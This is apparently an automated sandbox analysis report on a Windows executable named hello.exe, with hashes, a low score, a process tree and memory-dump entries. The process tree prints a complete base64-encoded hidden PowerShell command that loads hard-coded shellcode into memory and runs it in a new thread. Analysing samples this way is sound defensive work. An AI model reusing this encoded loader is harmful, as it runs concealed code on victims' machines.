Overview

overview

3

Static

static

3

hello.exe

windows10-1703-x64

1

hello.exe

windows10-1703-x64

1

Resubmissions

30/04/2024, 04:14

240430-etndgabh97 8

30/04/2024, 04:09

240430-eq4laabh49 3

Analysis

  • max time kernel
    134s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30/04/2024, 04:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    hello.exe

  • Size

    19KB

  • MD5

    efe0d8e9ace006818f0cff13690c0d78

  • SHA1

    f1020d62000df19d9c60af39cf8457b0ef35f69b

  • SHA256

    3a80c99bb8fa69f219204912dbd54751fcef4100418731e897bf3a813bc833f8

  • SHA512

    2466a98a0f0b8ae25f49d3f5649bd6151043d83fef0e8e35abc2e90977e48db8325aeea8fea3def2bad5f3b6be2fbc8f0d030fac198d8fc78d804c13bd57b1d6

  • SSDEEP

    384:hEEoLO56ayzcMj+zdO/5qU9B3SDP/wgcYsINeWkoP73A:+E8O56lcVdwgc5INeO7w

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\hello.exe
    "C:\Users\Admin\AppData\Local\Temp\hello.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:524
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAB0AHoAbQAgAD0AIAAnACQAWABOAEgAYQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABYAE4ASABhACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAYgBlACwAMAB4ADIAOQAsADAAeABmAGMALAAwAHgAZAA0ACwAMAB4ADcANAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMwAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADYAMwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeABlADIALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAzAGMALAAwAHgAZgBiACwAMAB4ADEAZQAsADAAeABmADkALAAwAHgAYgBkACwAMAB4ADYANAAsADAAeAAyAGYALAAwAHgAMgBiACwAMAB4ADMANAAsADAAeAA4ADEALAAwAHgAMgBiACwAMAB4ADQAMAAsADAAeAAxADUALAAwAHgANwBhACwAMAB4ADMAOAAsADAAeAAwADQALAAwAHgAOQA2ACwAMAB4AGYAMQAsADAAeAA2AGMALAAwAHgAYgBkACwAMAB4AGEAOQAsADAAeABiADIALAAwAHgAZABhACwAMAB4ADkAYgAsADAAeAA4ADQALAAwAHgANAAzACwAMAB4ADUAMQAsADAAeAA5ADEALAAwAHgAYwBlACwAMAB4ADgAYQAsADAAeABhADUALAAwAHgAZgBhACwAMAB4ADMAMwAsADAAeAA4AGMALAAwAHgANQA5ACwAMAB4ADAAMQAsADAAeAA2ADAALAAwAHgANgBlACwAMAB4ADYAMAAsADAAeABjAGEALAAwAHgANwA1ACwAMAB4ADYAZgAsADAAeABhADUALAAwAHgAOQBjACwAMAB4AGYAMAAsADAAeAA4ADAALAAwAHgANwBiACwAMAB4ADkANAAsADAAeABhADkALAAwAHgANABlACwAMAB4ADIAYwAsADAAeAAyADEALAAwAHgAMABmACwAMAB4ADUAMwAsADAAeABkADMALAAwAHgAZQA1ACwAMAB4ADEAYgAsADAAeABlAGIALAAwAHgAYQBiACwAMAB4ADgAMAAsADAAeABkAGMALAAwAHgAOQA4ACwAMAB4ADAANwAsADAAeAA4AGEALAAwAHgAMABjACwAMAB4AGUAYgAsADAAeABkAGYALAAwAHgAOQA0ACwAMAB4AGYAYwAsADAAeAA2ADcALAAwAHgAOAA3ACwAMAB4ADgANAAsADAAeABmAGQALAAwAHgAYQA0ACwAMAB4AGIAMgAsADAAeAAwAGMALAAwAHgAOAA5ACwAMAB4ADcANgAsADAAeABmADUALAAwAHgAMAA1ACwAMAB4ADQANgAsADAAeAAwAGMALAAwAHgAMwA0ACwAMAB4AGUANQAsADAAeABhADYALAAwAHgAYwA0ACwAMAB4ADAANwAsADAAeABkADkALAAwAHgANgA4ACwAMAB4ADIANwAsADAAeAA2AGEALAAwAHgANwA1ACwAMAB4ADYAYgAsADAAeAA3AGYALAAwAHgANABjACwAMAB4ADYANQAsADAAeAAxADkALAAwAHgAOABiACwAMAB4AGEAZgAsADAAeAAxADgALAAwAHgAMQBhACwAMAB4ADQAOAAsADAAeABkADIALAAwAHgAYwA2ACwAMAB4AGEAZgAsADAAeAA0AGYALAAwAHgANwA0ACwAMAB4ADgAYwAsADAAeAAwADgALAAwAHgAYgA0ACwAMAB4ADgANQAsADAAeAA0ADEALAAwAHgAYwBlACwAMAB4ADMAZgAsADAAeAA4ADkALAAwAHgAMgBlACwAMAB4ADgANAAsADAAeAAxADgALAAwAHgAOABkACwAMAB4AGIAMQAsADAAeAA0ADkALAAwAHgAMQAzACwAMAB4AGEAOQAsADAAeAAzAGEALAAwAHgANgBjACwAMAB4AGYANAAsADAAeAAzADgALAAwAHgANwA4ACwAMAB4ADQAYgAsADAAeABkADAALAAwAHgANgAxACwAMAB4AGQAYQAsADAAeABmADIALAAwAHgANAAxACwAMAB4AGMAZgAsADAAeAA4AGQALAAwAHgAMABiACwAMAB4ADkAMQAsADAAeABiADcALAAwAHgANwAyACwAMAB4AGEAZQAsADAAeABkADkALAAwAHgANQA1ACwAMAB4ADYANAAsADAAeABjAGUALAAwAHgAMgAxACwAMAB4AGEANgAsADAAeAA4ADkALAAwAHgAOQAyACwAMAB4AGIANQAsADAAeAAzADYALAAwAHgAMQAzACwAMAB4ADUAOQAsADAAeAA0ADYALAAwAHgAYQBlACwAMAB4AGEAYwAsADAAeABjADgALAAwAHgAMgA4ACwAMAB4ADQANwAsADAAeAAwADcALAAwAHgANgAzACwAMAB4AGYAOQAsADAAeABlADAALAAwAHgAOAAxACwAMAB4ADcANAAsADAAeABmAGUALAAwAHgAZABiACwAMAB4AGYAZgAsADAAeABhADEALAAwAHgANQAzACwAMAB4AGIAMAAsADAAeABhAGMALAAwAHgAMAA2ACwAMAB4ADAANwAsADAAeAA1AGUALAAwAHgANgA5ACwAMAB4AGYAZgAsADAAeABkAGUALAAwAHgAMwA5ACwAMAB4ADcAMgAsADAAeAAyAGEALAAwAHgANwAzACwAMAB4ADEANgAsADAAeABlADcALAAwAHgAZAA2ACwAMAB4ADIANwAsADAAeABjAGIALAAwAHgAOQBmACwAMAB4ADcANgAsADAAeABjAGYALAAwAHgAZQBiACwAMAB4ADUAZgAsADAAeAA2AGYALAAwAHgANgAwACwAMAB4AGUAYgAsADAAeAA1AGYALAAwAHgANgBmACwAMAB4AGEAZQAsADAAeABhAGUALAAwAHgAMwBhACwAMAB4ADIAOQAsADAAeABkAGMALAAwAHgAMQBkACwAMAB4AGIAMgAsADAAeAA4ADEALAAwAHgAMgBjACwAMAB4ADAANQAsADAAeAA1ADAALAAwAHgAYgBkACwAMAB4ADcANAAsADAAeABlAGQALAAwAHgAZQA0ACwAMAB4ADcAMAAsADAAeABlADEALAAwAHgAMwBmACwAMAB4ADkAOAAsADAAeAAwADgALAAwAHgAYgBhACwAMAB4ADYAZAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUAZAAsADAAeABhADUALAAwAHgAZQBmACwAMAB4ADMAYgAsADAAeABjADQALAAwAHgAYQAxACwAMAB4AGUAZgAsADAAeABlAGIALAAwAHgAOQAwACwAMAB4ADcAZQAsADAAeAA3ADkALAAwAHgAOQA0ACwAMAB4AGEANwAsADAAeAA3AGYALAAwAHgAYQBjACwAMAB4ADIAMgAsADAAeABlADEALAAwAHgAMgBjACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAZABjACwAMAB4ADMAYQAsADAAeAAzADMALAAwAHgANgA2ACwAMAB4ADcAMwAsADAAeABlADkALAAwAHgANgBiACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgANgA1ACwAMAB4ADcAZgAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADQAZQAsADAAeAA4ADAALAAwAHgAZQA3ACwAMAB4ADYAZQAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4ADUANwAsADAAeABlADcALAAwAHgAOQBhACwAMAB4AGIAYQAsADAAeAA2ADcALAAwAHgAZgA3ACwAMAB4ADEAMwAsADAAeAA1AGMALAAwAHgAMABkACwAMAB4AGYAMwAsADAAeAA3ADMALAAwAHgAZgA3ACwAMAB4AGMAZAAsADAAeABhAGQALAAwAHgAMQBiACwAMAB4ADcAMgAsADAAeABiADQALAAwAHgAYwBmACwAMAB4ADUAZAAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGEAMwAsADAAeAAzADIALAAwAHgAMgBmACwAMAB4ADUAZAAsADAAeAAxADIALAAwAHgAZABjACwAMAB4AGUAMgAsADAAeAA2ADcALAAwAHgAOAAyACwAMAB4ADYANwAsADAAeAAwADIALAAwAHgAYgAyACwAMAB4ADMANwAsADAAeAA1ADcALAAwAHgAOAA5ACwAMAB4ADIAYgAsADAAeAA1ADAALAAwAHgAZABmACwAMAB4ADYAMQAsADAAeAA1ADQALAAwAHgAYQAwACwAMAB4AGIANwAsADAAeABjADEALAAwAHgAYQA0ACwAMAB4ADkANQAsADAAeABhADcALAAwAHgAMwA1ACwAMAB4ADkAMQAsADAAeAA5ADkALAAwAHgANQAyACwAMAB4ADAANwAsADAAeAA3ADIALAAwAHgAZAA2ACwAMAB4ADIAOQAsADAAeAAzADUALAAwAHgAZAA1ACwAMAB4AGUAOQAsADAAeAA4ADQALAAwAHgANQAwACwAMAB4ADkAYQAsADAAeAA3AGQALAAwAHgAMgA2ACwAMAB4AGIANQAsADAAeAAxAGEALAAwAHgANwBlACwAMAB4ADQAZQAsADAAeABiADUALAAwAHgAMQBhACwAMAB4ADMAZQAsADAAeAA4AGUALAAwAHgAZQA2ACwAMAB4ADcAMgAsADAAeABlADYALAAwAHgAMgBhACwAMAB4ADUAYgAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4AGUANwAsADAAeABjAGYALAAwAHgAMwBiACwAMAB4ADQANQAsADAAeAA4AGUALAAwAHgAMQA3ACwAMAB4AGUAYwAsADAAeAAwADEALAAwAHgAOQAwACwAMAB4AGYANwAsADAAeAAxADMALAAwAHgAZAAyACwAMAB4AGMAMwAsADAAeABhADEALAAwAHgANwBiACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAYwA0ACwAMAB4ADkAZQAsADAAeAAxAGIALAAwAHgAYQBjACwAMAB4ADUAMgAsADAAeAA5AGUALAAwAHgAOQAwACwAMAB4ADgAMwAsADAAeABkADYALAAwAHgAMQA4ACwAMAB4ADUAOAAsADAAeABkADgALAAwAHgANgBjACwAMAB4AGUANgAsADAAeAAyAGYALAAwAHgAMwBiACwAMAB4ADMANgAsADAAeAAyADQALAAwAHgAOQAwACwAMAB4ADIAYgAsADAAeABhAGUALAAwAHgANQA1ACwAMAB4AGQAMAAsADAAeAA1ADQALAAwAHgAMAAwACwAMAB4ADkAMwAsADAAeAAxAGQALAAwAHgAOAA0ACwAMAB4ADUAMgAsADAAeABkADUALAAwAHgANQA5ACwAMAB4AGYANgAsADAAeABhAGMALAAwAHgAMgAxACwAMAB4AGIANAAsADAAeAAzADcALAAwAHgAZgBmACwAMAB4ADYAOQAsADAAeABjADgAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEoAYQBYAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABKAGEAWAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQASgBhAFgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHoAbQApACkAOwAkAG4AeAA3AFYAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABHADYAQwBWACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAEcANgBDAFYAIAAkAG4AeAA3AFYAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAbgB4ADcAVgAgACQAZQAiADsAfQA=
      2⤵
        PID:192

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-0-0x00000000000D0000-0x00000000000DC000-memory.dmp

      Filesize

      48KB

      Download

    • memory/524-2-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/524-3-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp

      Filesize

      9.9MB

      Download